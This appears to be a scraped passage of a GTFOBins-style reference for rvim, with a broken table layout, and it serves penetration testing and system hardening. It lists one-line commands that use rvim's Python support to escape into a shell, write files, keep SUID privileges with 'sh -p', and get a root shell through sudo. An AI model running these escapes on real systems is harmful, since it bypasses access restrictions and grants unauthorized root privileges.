description |
code |
This requires that `rvim` is compiled with Python support. Prepend `:py3` for Python 3. |
rvim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")' |
|
|
description |
code |
This requires that rvim is compiled with Python support. Prepend `:py3` for Python 3. |
rvim file_to_write
iDATA
^[
w
|
|
|
|
description |
code |
This requires that `rvim` is compiled with Python support. Prepend `:py3` for Python 3. |
./rvim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")' |
|
|
description |
code |
This requires that `rvim` is compiled with Python support. Prepend `:py3` for Python 3. |
sudo rvim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")' |
|
|